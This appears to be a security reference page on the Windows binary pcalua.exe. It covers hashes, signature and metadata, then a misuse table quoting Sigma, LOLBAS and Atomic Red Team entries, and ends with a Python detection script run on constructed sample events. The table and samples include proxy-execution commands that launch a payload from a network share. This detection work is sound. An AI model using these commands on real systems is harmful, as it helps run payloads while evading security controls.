pcalua.exe

  • File Path: C:\WINDOWS\system32\pcalua.exe
  • Description: Program Compatibility Assistant

Hashes

Type Hash
MD5 192AFE8050468A45CFDA06E8121E0A24
SHA1 EDBC97483C2BDC605F6A4B833715A03C080C996D
SHA256 054A2731200E7414949956243D91A9AAB024A75621ADC32AFF389B7426FE56DB
SHA384 398592870C29D8372C3280AAA3E3F52FEDAB90A137C0E16A6F0D75297A777BD1FAA162E1FCE207D864062C6E0220542E
SHA512 A193E8A9282F37FC3DC27B39BF00525D6BC95AD0CE79A16E68723C3B54B70705B2A8FB2E89DDA0288BAD04D5D39CD011D28A3BE55CE6739ECE4E60D2E76B5C36
SSDEEP 768:NoOhaDTjahwBpvNiFDFc4z2d9uyUDchclHrDhKAV7KJvJwmRg7A+ljIGoxGWTGaI:N3ujViZ2d9uHhJ7yw7ljIGGGWhq
IMP DB6289009B9D69036A82B835D8E2445D
PESHA1 004CAEE8CBE4D0354BA7BE06B03504A1DF750A7C
PE256 B7A4B807D0F9A3088BDEF14DA6B251E532CFC10239C89C9FD6B27CDF3B5125E1

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\System32\GDI32.dll
C:\WINDOWS\System32\gdi32full.dll
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\System32\msvcp_win.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\pcalua.exe
C:\WINDOWS\System32\ucrtbase.dll
C:\WINDOWS\System32\USER32.dll
C:\WINDOWS\System32\win32u.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename:
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/054a2731200e7414949956243d91a9aab024a75621adc32aff389b7426fe56db/detection

Possible Misuse

The following table contains possible examples of pcalua.exe being misused. pcalua.exe is not inherently malicious, but it launches whatever path is passed to its -a switch as its own child process (with -c supplying the target's arguments), so it can act as a Microsoft-signed proxy for running a payload, including one on a UNC share, without calling cmd.exe directly (MITRE ATT&CK T1202, Indirect Command Execution). The artifact to look for is a process whose parent image is pcalua.exe.

Source | Source File | Example | License
sigma | proc_creation_win_indirect_cmd.yml | description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). | DRL 1.0
sigma | proc_creation_win_indirect_cmd.yml | - '\pcalua.exe' | DRL 1.0
LOLBAS | Pcalua.yml | Name: Pcalua.exe |
LOLBAS | Pcalua.yml | - Command: pcalua.exe -a calc.exe |
LOLBAS | Pcalua.yml | - Command: pcalua.exe -a \\server\payload.dll |
LOLBAS | Pcalua.yml | - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java |
LOLBAS | Pcalua.yml | - Path: C:\Windows\System32\pcalua.exe |
malware-ioc | misp_invisimole.json | "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", | © ESET 2014-2018
atomic-red-team | index.md | - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] | MIT License. © 2018 Red Canary
atomic-red-team | windows-index.md | - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | <blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | - Atomic Test #1 - Indirect Command Execution - pcalua.exe | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | ## Atomic Test #1 - Indirect Command Execution - pcalua.exe | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | pcalua.exe -a #{process} | MIT License. © 2018 Red Canary
atomic-red-team | T1202.md | pcalua.exe -a #{payload_path} | MIT License. © 2018 Red Canary
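Added example, not code from the Strontic page, the Sigma project, LOLBAS or Atomic Red Team: a small Python hunt that approximates with hand-written logic what the cited Sigma rule is after, namely process-creation events where pcalua.exe is the parent image, or where pcalua.exe itself is invoked with -a. The event records are constructed Sysmon Event ID 1-style samples (field names Image, ParentImage, CommandLine, User), not real telemetry, and the "remote-target" and "non-exe-target" tags are hunting heuristics of this example, not logic taken from the rule.

```python
"""Hunt for pcalua.exe indirect command execution (ATT&CK T1202) in
process-creation events. Added example; the records below are constructed
samples, not real telemetry, and the detection logic is this example's own
approximation of the cited Sigma rule, not the rule's YAML."""
import re
from typing import Dict, List, Optional

# Constructed Sysmon Event ID 1-style records (hypothetical sample data).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'pcalua.exe -a "C:\Users\bob\Downloads\setup.exe"',
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": "calc.exe",
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\pcalua.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pcalua.exe -a \\fileserv\share\payload.dll",
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"rundll32.exe \\fileserv\share\payload.dll,Run",
     "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe",
     "User": r"CORP\bob"},
]

# Either a double-quoted run (quotes stripped) or a bare non-space token.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_pcalua_args(cmdline: str) -> Optional[Dict[str, str]]:
    """Return {'target', 'args'} for 'pcalua.exe -a <target> [-c <args>]'.

    Returns None when no -a switch is present. Everything after -c is treated
    as the target's argument string, matching the LOLBAS usage above."""
    toks = tokenize(cmdline)
    target = None
    args = ""
    i = 0
    while i < len(toks):
        low = toks[i].lower()
        if low == "-a" and i + 1 < len(toks):
            target = toks[i + 1]
            i += 2
        elif low == "-c":
            args = " ".join(toks[i + 1:])
            break
        else:
            i += 1
    if target is None:
        return None
    return {"target": target, "args": args}


def _is_pcalua(path: str) -> bool:
    return path.lower().endswith("\\pcalua.exe")


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is interesting; an empty list means clean."""
    reasons: List[str] = []
    if _is_pcalua(event.get("ParentImage", "")):
        reasons.append("child-of-pcalua")       # the indirect execution itself
    if _is_pcalua(event.get("Image", "")):
        parsed = parse_pcalua_args(event.get("CommandLine", ""))
        if parsed:
            reasons.append("pcalua-launch")     # pcalua told to run something
            target = parsed["target"]
            if target.startswith("\\\\"):
                reasons.append("remote-target")  # UNC path, as in the LOLBAS row
            if not target.lower().endswith(".exe"):
                reasons.append("non-exe-target")  # .dll/.cpl handed to pcalua
    return reasons


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch and return only the flagged events."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append({"index": idx, "image": ev.get("Image", ""),
                         "user": ev.get("User", ""), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Baseline which parents and targets of pcalua.exe are normal in your own environment before paging on every hit; the high-signal cases are a child of pcalua.exe that is an interpreter or proxy (cmd.exe, powershell.exe, rundll32.exe) and an -a target on a UNC share, which is what the "remote-target" and "non-exe-target" tags isolate in the sample set.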

MIT License. Copyright (c) 2020-2021 Strontic.